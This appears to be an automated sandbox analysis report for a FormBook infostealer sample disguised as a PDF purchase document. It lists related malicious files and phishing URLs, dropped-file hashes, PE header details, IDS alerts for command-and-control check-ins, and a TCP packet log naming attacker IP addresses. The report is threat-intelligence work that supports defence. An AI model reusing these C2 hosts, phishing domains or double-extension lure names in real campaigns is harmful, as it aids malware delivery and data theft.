                DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                • 104.26.13.205
                https://doc-online.totalenergies.com/web/totalenergies-marketing-franceGet hashmaliciousUnknownBrowse
                • 162.247.243.29
                Payment_Advice.xlsGet hashmaliciousUnknownBrowse
                • 172.67.180.182
                B24E33 ENQUIRY.vbeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • 172.67.74.152
                DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                https://www.getaround.co.il/wp-logs/?r=mag372@norauto.esGet hashmaliciousHTMLPhisherBrowse
                • 104.17.2.184
                Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                • 66.235.200.146
                AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                Att00173994.exeGet hashmaliciousFormBookBrowse
                • 104.21.92.152
                CLOUDIE-AS-APCloudieLimitedHKSiparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                • 103.197.25.241
                BviOG97ArX.elfGet hashmaliciousMirai, MoobotBrowse
                • 102.129.161.100
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 103.197.25.241
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 103.197.25.241
                KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                • 103.197.25.241
                http://telegravm.work/Get hashmaliciousTelegram PhisherBrowse
                • 103.119.3.186
                http://telegrart.work/Get hashmaliciousUnknownBrowse
                • 103.140.126.137
                http://telegrarl.work/Get hashmaliciousTelegram PhisherBrowse
                • 103.140.126.137
                http://telegraem.work/Get hashmaliciousTelegram PhisherBrowse
                • 103.140.126.137
                http://telegrram.work/Get hashmaliciousTelegram PhisherBrowse
                • 103.140.127.200
                CONFLUENCE-NETWORK-INCVGSiparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                RSW6103D401005.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                http://pollyfill.ioGet hashmaliciousUnknownBrowse
                • 208.91.196.253
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27
                e98.dllGet hashmaliciousUnknownBrowse
                • 204.11.56.48
                e98.dllGet hashmaliciousUnknownBrowse
                • 204.11.56.48
                KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                • 208.91.197.27

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.log

                Download File
                Process:C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1216
                Entropy (8bit):5.34331486778365
                Encrypted:false
                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                Malicious:true
                Reputation:high, very likely benign file
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.7307872139132228
                Encrypted:false
                SSDEEP:3:NlllulF/lll:NllUF/ll
                MD5:3ECB05F56210644B241FF459B861D309
                SHA1:1A33420F5866C42A5ED3CFF0DD505451FBFA8072
                SHA-256:712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
                SHA-512:79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:@...e.................................^.........................

                C:\Users\user\AppData\Local\Temp\7454168B

                Download File
                Process:C:\Windows\SysWOW64\unregmp2.exe
                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                Category:dropped
                Size (bytes):196608
                Entropy (8bit):1.1221538113908904
                Encrypted:false
                SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g44p4srt.gmq.psm1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmylzck2.c5h.ps1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.9750407370810565
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                • Generic Win/DOS Executable (2004/3) 0.01%
                File name:Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                File size:721'920 bytes
                MD5:7c9c6894ac6c53f5066c4e42a0e2121f
                SHA1:8f6ed8a129c9968be749912335313e0886eb93e8
                SHA256:a8528698af2f0256467229c6e265bad403c57d941040cfd94678516769587394
                SHA512:b5f506d5f0099421d413185286abc0193a50445289ffef58db6e4dd81a562ee1f957f90c0b674eb9715c0ed3a871faae35d6b9b4a21b388d85c4bcc058def15d
                SSDEEP:12288:WU1KyjSANT3ukfnzbzo/yS+2JepJn4ZH9J9xRr9YjoVMJwguJYw+io2lpXcwqkOQ:WmFjFT3ukPzAE2MpO1zRaMVWwgaXHq
                TLSH:F0E423816D580BBFFF6C223A4C850A51B3367A553AB2FB8914EC659C43A3E5077713A3
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.................. ... ....@.. .......................`............@................................

                File Icon

                Icon Hash:00928e8e8686b000

                Static PE Info

                General

                Entrypoint:0x4b12a2
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x66838BF3 [Tue Jul 2 05:11:15 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xb12500x4f.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x5b8.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000xaf2a80xaf40094c3c8528eff6a1e8da507301bde5e7fFalse0.9778915165834522data7.983864382590907IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0xb20000x5b80x800ca5b1e3837d5d2e371b2dc1c683d400cFalse0.31640625data3.332904512469349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0xb40000xc0x40008176bb2034a5b7d1653b3cce706b03cFalse0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_VERSION0xb20900x328data0.41955445544554454
                RT_MANIFEST0xb23c80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                07/03/24-08:55:01.105331TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973280192.168.2.9109.95.158.122
                07/03/24-08:55:20.732693TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973880192.168.2.9203.161.49.220
                07/03/24-08:54:02.020834TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972280192.168.2.991.195.240.19
                07/03/24-08:53:24.844984TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971380192.168.2.923.111.180.146
                07/03/24-08:55:29.093709TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974080192.168.2.935.227.248.111
                07/03/24-08:56:04.638587TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974880192.168.2.947.239.13.172
                07/03/24-08:56:36.014218TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975680192.168.2.966.235.200.146
                07/03/24-08:54:23.384319TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972680192.168.2.9212.227.172.254
                07/03/24-08:53:40.500764TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971480192.168.2.9103.197.25.241
                07/03/24-08:56:18.562243TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975280192.168.2.9208.91.197.27
                07/03/24-08:55:15.453695TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973680192.168.2.9203.161.49.220
                07/03/24-08:56:50.135997TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975980192.168.2.923.111.180.146
                07/03/24-08:54:44.777107TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973080192.168.2.991.195.240.19
                07/03/24-08:56:33.481768TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975580192.168.2.966.235.200.146
                07/03/24-08:56:41.357758TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975880192.168.2.966.235.200.146
                07/03/24-08:56:16.022083TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975180192.168.2.9208.91.197.27
                07/03/24-08:56:23.640915TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975480192.168.2.9208.91.197.27
                07/03/24-08:56:09.881718TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975080192.168.2.947.239.13.172
                07/03/24-08:55:42.559837TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974480192.168.2.991.195.240.19
                07/03/24-08:55:06.168627TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973480192.168.2.9109.95.158.122
                07/03/24-08:54:37.153150TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972780192.168.2.991.195.240.19
                07/03/24-08:56:02.093268TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974780192.168.2.947.239.13.172
                07/03/24-08:54:15.772854TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972380192.168.2.9212.227.172.254
                07/03/24-08:54:18.312501TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972480192.168.2.9212.227.172.254
                07/03/24-08:54:58.567220TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973180192.168.2.9109.95.158.122
                07/03/24-08:53:56.921708TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972080192.168.2.991.195.240.19
                07/03/24-08:53:48.213388TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971880192.168.2.9103.197.25.241
                07/03/24-08:56:55.682832TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976080192.168.2.9103.197.25.241
                07/03/24-08:53:43.084184TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971580192.168.2.9103.197.25.241
                07/03/24-08:55:26.552687TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973980192.168.2.935.227.248.111
                07/03/24-08:55:47.620909TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974680192.168.2.991.195.240.19
                07/03/24-08:55:12.911126TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973580192.168.2.9203.161.49.220
                07/03/24-08:54:39.703690TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972880192.168.2.991.195.240.19
                07/03/24-08:53:54.381543TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971980192.168.2.991.195.240.19
                07/03/24-08:55:34.151088TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974280192.168.2.935.227.248.111
                07/03/24-08:55:40.021503TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974380192.168.2.991.195.240.19

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 3, 2024 08:53:24.837579966 CEST4971380192.168.2.923.111.180.146
                Jul 3, 2024 08:53:24.842494011 CEST804971323.111.180.146192.168.2.9
                Jul 3, 2024 08:53:24.842567921 CEST4971380192.168.2.923.111.180.146
                Jul 3, 2024 08:53:24.844984055 CEST4971380192.168.2.923.111.180.146
                Jul 3, 2024 08:53:24.849829912 CEST804971323.111.180.146192.168.2.9
                Jul 3, 2024 08:53:25.374732018 CEST804971323.111.180.146192.168.2.9
                Jul 3, 2024 08:53:25.374804020 CEST804971323.111.180.146192.168.2.9
                Jul 3, 2024 08:53:25.374883890 CEST4971380192.168.2.923.111.180.146
                Jul 3, 2024 08:53:25.378233910 CEST4971380192.168.2.923.111.180.146
                Jul 3, 2024 08:53:25.383140087 CEST804971323.111.180.146192.168.2.9
                Jul 3, 2024 08:53:40.484989882 CEST4971480192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:40.489839077 CEST8049714103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:40.489923954 CEST4971480192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:40.500763893 CEST4971480192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:40.505693913 CEST8049714103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:41.404473066 CEST8049714103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:41.404500961 CEST8049714103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:41.404544115 CEST4971480192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:42.030477047 CEST4971480192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:43.075831890 CEST4971580192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:43.080909014 CEST8049715103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:43.080982924 CEST4971580192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:43.084183931 CEST4971580192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:43.089138985 CEST8049715103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:43.992197990 CEST8049715103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:43.993108034 CEST8049715103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:43.993164062 CEST4971580192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:44.593014002 CEST4971580192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:45.647958040 CEST4971780192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:45.654356956 CEST8049717103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:45.654436111 CEST4971780192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:45.668262959 CEST4971780192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:45.673285007 CEST8049717103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:45.673295975 CEST8049717103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:46.523559093 CEST8049717103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:46.524185896 CEST8049717103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:46.527694941 CEST4971780192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:47.171200037 CEST4971780192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:48.205215931 CEST4971880192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:48.211339951 CEST8049718103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:48.211452961 CEST4971880192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:48.213387966 CEST4971880192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:48.219414949 CEST8049718103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:49.313640118 CEST8049718103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:49.313756943 CEST8049718103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:49.313767910 CEST8049718103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:49.313935041 CEST4971880192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:49.316525936 CEST4971880192.168.2.9103.197.25.241
                Jul 3, 2024 08:53:49.321343899 CEST8049718103.197.25.241192.168.2.9
                Jul 3, 2024 08:53:54.374229908 CEST4971980192.168.2.991.195.240.19
                Jul 3, 2024 08:53:54.379174948 CEST804971991.195.240.19192.168.2.9
                Jul 3, 2024 08:53:54.379245996 CEST4971980192.168.2.991.195.240.19
                Jul 3, 2024 08:53:54.381542921 CEST4971980192.168.2.991.195.240.19
                Jul 3, 2024 08:53:54.386400938 CEST804971991.195.240.19192.168.2.9
                Jul 3, 2024 08:53:55.015577078 CEST804971991.195.240.19192.168.2.9
                Jul 3, 2024 08:53:55.015651941 CEST804971991.195.240.19192.168.2.9
                Jul 3, 2024 08:53:55.015722036 CEST4971980192.168.2.991.195.240.19
                Jul 3, 2024 08:53:55.890305996 CEST4971980192.168.2.991.195.240.19
                Jul 3, 2024 08:53:56.914294958 CEST4972080192.168.2.991.195.240.19
                Jul 3, 2024 08:53:56.919707060 CEST804972091.195.240.19192.168.2.9
                Jul 3, 2024 08:53:56.919836998 CEST4972080192.168.2.991.195.240.19
                Jul 3, 2024 08:53:56.921708107 CEST4972080192.168.2.991.195.240.19
                Jul 3, 2024 08:53:56.927448988 CEST804972091.195.240.19192.168.2.9
                Jul 3, 2024 08:53:57.567919970 CEST804972091.195.240.19192.168.2.9
                Jul 3, 2024 08:53:57.568101883 CEST804972091.195.240.19192.168.2.9
                Jul 3, 2024 08:53:57.568180084 CEST4972080192.168.2.991.195.240.19
                Jul 3, 2024 08:53:58.436861992 CEST4972080192.168.2.991.195.240.19
                Jul 3, 2024 08:53:59.464029074 CEST4972180192.168.2.991.195.240.19
                Jul 3, 2024 08:53:59.468959093 CEST804972191.195.240.19192.168.2.9
                Jul 3, 2024 08:53:59.469043016 CEST4972180192.168.2.991.195.240.19
                Jul 3, 2024 08:53:59.471044064 CEST4972180192.168.2.991.195.240.19
                Jul 3, 2024 08:53:59.475960970 CEST804972191.195.240.19192.168.2.9
                Jul 3, 2024 08:53:59.476178885 CEST804972191.195.240.19192.168.2.9
                Jul 3, 2024 08:54:00.123451948 CEST804972191.195.240.19192.168.2.9
                Jul 3, 2024 08:54:00.123591900 CEST804972191.195.240.19192.168.2.9
                Jul 3, 2024 08:54:00.123769045 CEST4972180192.168.2.991.195.240.19
                Jul 3, 2024 08:54:00.128175974 CEST804972191.195.240.19192.168.2.9
                Jul 3, 2024 08:54:00.128227949 CEST4972180192.168.2.991.195.240.19
                Jul 3, 2024 08:54:00.983755112 CEST4972180192.168.2.991.195.240.19
                Jul 3, 2024 08:54:02.007438898 CEST4972280192.168.2.991.195.240.19
                Jul 3, 2024 08:54:02.012465954 CEST804972291.195.240.19192.168.2.9
                Jul 3, 2024 08:54:02.012588978 CEST4972280192.168.2.991.195.240.19
                Jul 3, 2024 08:54:02.020833969 CEST4972280192.168.2.991.195.240.19
                Jul 3, 2024 08:54:02.025743008 CEST804972291.195.240.19192.168.2.9
                Jul 3, 2024 08:54:02.654025078 CEST804972291.195.240.19192.168.2.9
                Jul 3, 2024 08:54:02.654068947 CEST804972291.195.240.19192.168.2.9
                Jul 3, 2024 08:54:02.654354095 CEST4972280192.168.2.991.195.240.19
                Jul 3, 2024 08:54:02.663253069 CEST4972280192.168.2.991.195.240.19
                Jul 3, 2024 08:54:02.668518066 CEST804972291.195.240.19192.168.2.9
                Jul 3, 2024 08:54:15.766067028 CEST4972380192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:15.770880938 CEST8049723212.227.172.254192.168.2.9
                Jul 3, 2024 08:54:15.770992994 CEST4972380192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:15.772854090 CEST4972380192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:15.777739048 CEST8049723212.227.172.254192.168.2.9
                Jul 3, 2024 08:54:16.396599054 CEST8049723212.227.172.254192.168.2.9
                Jul 3, 2024 08:54:16.396648884 CEST8049723212.227.172.254192.168.2.9
                Jul 3, 2024 08:54:16.396718025 CEST4972380192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:17.282237053 CEST4972380192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:18.305320024 CEST4972480192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:18.310391903 CEST8049724212.227.172.254192.168.2.9
                Jul 3, 2024 08:54:18.310519934 CEST4972480192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:18.312500954 CEST4972480192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:18.317336082 CEST8049724212.227.172.254192.168.2.9
                Jul 3, 2024 08:54:18.945698977 CEST8049724212.227.172.254192.168.2.9
                Jul 3, 2024 08:54:18.945825100 CEST8049724212.227.172.254192.168.2.9
                Jul 3, 2024 08:54:18.945878029 CEST4972480192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:19.827419043 CEST4972480192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:20.845752954 CEST4972580192.168.2.9212.227.172.254
                Jul 3, 2024 08:54:20.852406979 CEST8049725212.227.172.254192.168.2.9
                Jul 3, 2024 08:54:20.852489948 CEST4972580192.168.2.9212.227.172.254
